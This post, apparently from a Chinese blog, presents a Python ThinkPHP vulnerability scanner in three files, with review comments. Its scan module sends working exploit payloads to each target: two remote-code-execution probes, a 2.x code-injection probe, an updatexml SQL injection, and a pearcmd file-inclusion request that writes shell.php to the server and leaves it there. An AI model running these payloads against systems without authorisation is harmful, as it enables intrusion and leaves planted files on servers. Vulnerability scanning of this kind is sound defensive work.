python项目: Thinkphp框架漏洞扫描器集成
前言
该项目是将thinkphp各漏洞的漏扫器集成在一个项目中。
核心
该项目主要使用python代码完成,使用了bs4,requests,urllib等模块,使用了面向对象的编程方法,在展示上主要使用了rich模块。
代码
main.py(主函数,用来调用其他两个模块,并接收命令行输入的参数)
import argparse
import datetime
import sys
import thinkphp_rprint as rprint
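from thinkphp_scan import start_scan


def get_time():
    """Return the current local time formatted as ``YYYY-MM-DD HH:MM:SS``."""
    return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Mirror的thinkphp漏洞扫描器')
    parser.add_argument('-url', '--url', type=str, help='请输出目标的url')
    parser.add_argument('-file', '--file', type=str, help='请输入待检测存在漏洞url的txt文件')
    args = parser.parse_args()

    # Branch on the parsed values rather than on raw sys.argv: the option is
    # registered under both '-url' and '--url', and a literal '-url' in sys.argv
    # test misses the long spelling.
    if args.url is not None:
        rprint.info(get_time(), "thinkphp漏洞检测开始")
        start_scan(args.url)
        rprint.info(get_time(), "thinkphp漏洞检测结束")
    elif args.file is not None:
        # The context manager closes the file even if a scan raises.
        with open(args.file, 'r', encoding='utf-8') as file:
            rprint.info(get_time(), "thinkphp漏洞检测开始")
            for line in file:
                # Lines carry their trailing newline; strip it so the URL that
                # reaches start_scan is the bare text, and skip blank lines.
                url = line.strip()
                if not url:
                    continue
                start_scan(url)
            rprint.info(get_time(), "thinkphp漏洞检测结束")
    else:
        # Neither option given: show usage instead of exiting silently.
        parser.print_help()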
thinkphp_scan.py(执行漏洞检测的部分)
import datetime
import requests
from urllib.parse import *
import thinkphp_rprint as rprint


def get_time():
    """Return the current local time formatted as ``YYYY-MM-DD HH:MM:SS``."""
    now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    return now


class ThinkphpScan:
    """Container for the individual ThinkPHP checks.

    Every check below is declared without ``self`` and is invoked on the class
    itself from ``start_scan`` (``ThinkphpScan.<check>(url)``), so each one acts
    as a static method whose single argument is the target base URL string.
    Each check returns a dict with at least ``name`` and ``vulnerable``; when a
    marker is found it also records ``method``, ``url`` and ``payload``.

    Common caveats that apply to all checks:
    - the HTTP calls set no ``timeout``, so a host that never answers blocks the
      whole scan on that request;
    - the bare ``except:`` catches ``BaseException`` (including
      ``KeyboardInterrupt``) and silently reports "not vulnerable", so a
      network error is indistinguishable from a clean result;
    - the checks that pass ``verify=False`` disable TLS certificate verification
      for that request.
    """

    def __init__(self):
        pass

    def thinkphp_2x_scan(url):
        """Probe for the 2.x marker: the check's query string is joined onto
        *url* and ``vulnerable`` is set only if the expected MD5 text appears in
        the response body.

        NOTE(review): this is the one check that does not pass ``verify=False``,
        so an HTTPS target with an untrusted certificate raises inside ``try``
        and is reported as not vulnerable.
        """
        result = {
            "name" : "thinkphp_2x_scan",
            "vulnerable" : False,
        }
        try:
            payload = "?s=/handsome/jing/zi/${var_dump(md5(Mirror))}"
            urls = urljoin(url, payload)
            response = requests.get(url=urls)
            # Check whether md5(handsome_Mirror) shows up in the response body.
            if '2403def5083f02105e7802b3b315681e' in response.text:
                result['vulnerable'] = True
                result['method'] = 'GET'
                result['url'] = urls
                result['payload'] = payload
                return result
            else:
                return result
        except :
            # Any failure (connection, TLS, encoding) is reported as not vulnerable.
            return result

    def thinkphp_5_0_23_scan(url):
        """POST the form body in ``payload`` to ``/index.php?s=captcha`` and
        report ``vulnerable`` when the text ``PHP Version`` is in the response.

        The recorded ``payload`` is the form dict itself, not a URL, unlike the
        GET-based checks.
        """
        result = {
            "name" : "thinkphp_5_0_23_scan",
            "vulnerable" : False
        }
        payload = {
            '_method' : '__construct',
            'filter[]' : 'phpinfo',
            'method' : 'get',
            'server[REQUEST_METHOD]' : '1'
        }
        try:
            path = '/index.php?s=captcha'
            target = urljoin(url, path)
            # verify=False: certificate errors are ignored for this request.
            response = requests.post(url=target, data=payload, verify=False)
            if "PHP Version" in response.text:
                result['vulnerable'] = True
                result['method'] = 'POST'
                result['url'] = target
                result['payload'] = payload
                return result
            else:
                return result
        except:
            return result

    def thinkphp_5_rce_scan(url):
        """GET the ``poc`` path joined onto *url* and report ``vulnerable`` when
        the expected MD5 marker is present in the response body.

        ``result['url']`` is the full joined URL and ``result['payload']`` the
        raw ``poc`` path.
        """
        result = {
            "name": "thinkphp5-5.0.22/5.1.29 RCE",
            "vulnerable": False
        }
        try:
            poc = r'/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=handsome_Mirror'
            payload = urljoin(url, poc)
            response = requests.get(payload, verify=False)
            if '2f0477618daf4574f9e0e50eb84a7f8e' in response.text:
                result['vulnerable'] = True
                result['method'] = 'GET'
                result['url'] = payload
                result['payload'] = poc
                return result
            else:
                return result
        except:
            return result

    def thinkphp_5_sqli(url):
        """GET the ``poc`` path joined onto *url* and report ``vulnerable`` when
        the database error text ``XPATH syntax error`` is echoed back.

        Note that ``url`` is rebound to the joined URL inside ``try``, so both
        ``result['url']`` and ``result['payload']`` hold the same full URL.
        """
        result = {
            "name": "thinkphp5 sql injection and Sensitive information leakage",
            "vulnerable": False
        }
        try:
            poc = '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1'
            url = urljoin(url, poc)
            response = requests.get(url, verify=False)
            if 'XPATH syntax error' in response.text:
                result['vulnerable'] = True
                result['method'] = 'GET'
                result['url'] = url
                result['payload'] = url
                return result
            else:
                return result
        except:
            return result

    def thinkphp_6_upload(url):
        """Two-request check: the first GET asks the target to create
        ``shell.php``; the second GET requests ``<url>/shell.php`` and
        ``vulnerable`` is set purely on a 200 status code.

        NOTE(review): unlike the other checks this one is not read-only -- on a
        susceptible target it leaves ``shell.php`` behind, and nothing here
        removes it. The 200 test also fires on any server that answers 200 for
        unknown paths (custom error pages, catch-all routes), so a positive here
        is a weaker signal than the marker-string checks above. ``response_1``
        is never inspected.
        """
        result = {
            "name": "thinkphp6 lang local file inclusion",
            "vulnerable": False
        }
        try:
            poc = 'index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php'
            url_1 = urljoin(url, poc)
            response_1 = requests.get(url_1, verify=False)
            # Plain concatenation, not urljoin: a *url* ending in '/' yields '//shell.php'.
            url_2 = url + '/shell.php'
            response_2 = requests.get(url_2, verify=False)
            if response_2.status_code == 200:
                result['vulnerable'] = True
                result['method'] = 'GET'
                result['url'] = url_2
                result['payload'] = url_1
                return result
            else:
                return result
        except:
            return result


# Module-level entry point: main.py imports it with
# ``from thinkphp_scan import start_scan``, which is why it is placed outside
# the class here (the original listing's indentation is not recoverable).
def start_scan(self):
    """Run every check against one target and print a name/result line each.

    Despite its name, ``self`` is the target URL string handed in by main.py
    (``start_scan(args.url)``); it is forwarded unchanged to each check.
    NOTE(review): when main.py reads targets from ``-file`` the line's trailing
    newline is still attached to the string that arrives here -- confirm the
    caller strips it.
    """
    scan = ThinkphpScan.thinkphp_2x_scan(self)
    rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))
    scan = ThinkphpScan.thinkphp_5_0_23_scan(self)
    rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))
    scan = ThinkphpScan.thinkphp_5_rce_scan(self)
    rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))
    scan = ThinkphpScan.thinkphp_5_sqli(self)
    rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))
    scan = ThinkphpScan.thinkphp_6_upload(self)
    rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))
thinkphp_rprint.py(主要用于输出界面的美化)
from rich import print as rprint


def _console_line(date, level_tag, body):
    """Build one log line: ``[<date>] [<level>] > <body>`` with rich markup.

    ``date`` is wrapped in bold green, ``level_tag`` is inserted verbatim
    (callers supply its own markup) and ``body`` is appended as given.
    String concatenation is kept on purpose so non-str arguments still fail
    loudly, exactly as the callers expect.
    """
    return "[[bold green]" + date + "[/bold green]] [" + level_tag + "] > " + body


def error(date, body):
    """Print *body* as an Error line, highlighting the body in bold yellow."""
    rprint(_console_line(date, "[bold red]Error[/bold red]",
                         "[bold yellow]" + body + "[/bold yellow]"))


def success(date, body):
    """Print *body* as a Success line (green tag, body unstyled)."""
    rprint(_console_line(date, "[bold green]Success[/bold green]", body))


def info(date, body):
    """Print *body* as an Info line (blue tag, body unstyled)."""
    rprint(_console_line(date, "[bold blue]Info[/bold blue]", body))